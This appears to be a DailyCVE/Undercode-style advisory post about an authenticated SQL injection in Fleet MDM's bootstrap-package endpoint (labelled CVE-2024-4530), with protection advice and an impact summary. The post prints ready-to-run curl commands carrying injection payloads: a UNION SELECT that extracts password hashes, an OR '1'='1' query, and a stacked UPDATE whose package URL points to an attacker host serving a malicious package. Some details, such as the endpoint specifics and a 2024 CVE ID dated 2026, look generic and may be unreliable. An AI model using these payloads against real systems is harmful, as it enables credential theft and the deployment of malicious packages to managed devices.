Fleet, SQL Injection, CVE-2024-4530 (Critical)

Listen to this Post

How the CVE Works

The vulnerability resides in the Fleet MDM bootstrap package configuration endpoint. When an authenticated user with Team Admin or Global Admin privileges sends a request to modify or create a bootstrap package, the `team_id` parameter is accepted from the user input and embedded directly into a SQL query without proper parameterization or sanitization. By crafting a malicious `team_id` value with SQL metacharacters, an attacker can break the intended query structure. The application fails to validate that the user-supplied identifier matches the team they are authorized to manage. This allows the injected SQL to execute with the privileges of the database connection. An attacker can use a UNION-based payload to extract arbitrary columns from the `users` or `teams` tables, retrieving sensitive data like password hashes and API tokens. Alternatively, a UPDATE-based injection can modify configurations for teams outside the attacker’s scope. Because the API endpoint does not enforce ownership verification before constructing the query, a single request can lead to cross-team data corruption, privilege escalation, or complete database compromise, provided Apple MDM is enabled.

dailycve form:

Platform: Fleet MDM
Version: Affected versions
Vulnerability: SQL Injection
Severity: Critical
date: 2026-03-31

Prediction: Patch within 14 days

What Undercode Say:

Analytics:

  • Attack surface: Authenticated API endpoints with insufficient ORM usage.
  • Privilege required: Team Admin or Global Admin.
  • Dependency: Apple MDM must be enabled.
  • Data exfiltration potential: Full database read.

Bash commands and codes related to the blog

Identify vulnerable endpoint
curl -X PATCH "https://fleet.example.com/api/v1/fleet/mdm/bootstrap-package" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"team_id": "1 AND 1=0 UNION SELECT id, email, password_hash FROM users--"}'
Exploit for data extraction
curl -X GET "https://fleet.example.com/api/v1/fleet/mdm/teams/config?team_id=1%27%20OR%20%271%27%3D%271" \
-H "Authorization: Bearer $ADMIN_TOKEN"
Cross-team config modification
curl -X POST "https://fleet.example.com/api/v1/fleet/mdm/bootstrap-package" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"team_id": "2; UPDATE teams SET config=\"malicious\" WHERE id=3--", "package_url": "http://attacker.com/evil.pkg"}'

Exploit:

An attacker with Team Admin privileges sends a crafted PATCH request to `/api/v1/fleet/mdm/bootstrap-package` with a `team_id` value containing SQL injection payload. The server concatenates this value into a SQL statement without sanitization, allowing the attacker to read arbitrary tables or modify configurations of teams they do not own. The attack is executed via direct API calls using a valid JWT.

Protection from this CVE

Upgrade to the patched version where parameterized queries are enforced. If patching is not immediately possible, disable Apple MDM entirely via the Fleet configuration or restrict admin roles to the minimum necessary. Implement a Web Application Firewall (WAF) rule to block API requests containing SQL metacharacters in the `team_id` parameter.

Impact

Successful exploitation allows an authenticated admin to read password hashes, API tokens, and other secrets from the database. Attackers can alter configuration data for any team, leading to cross-team corruption, deployment of malicious MDM bootstrap packages, and potential full server compromise through privilege escalation.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top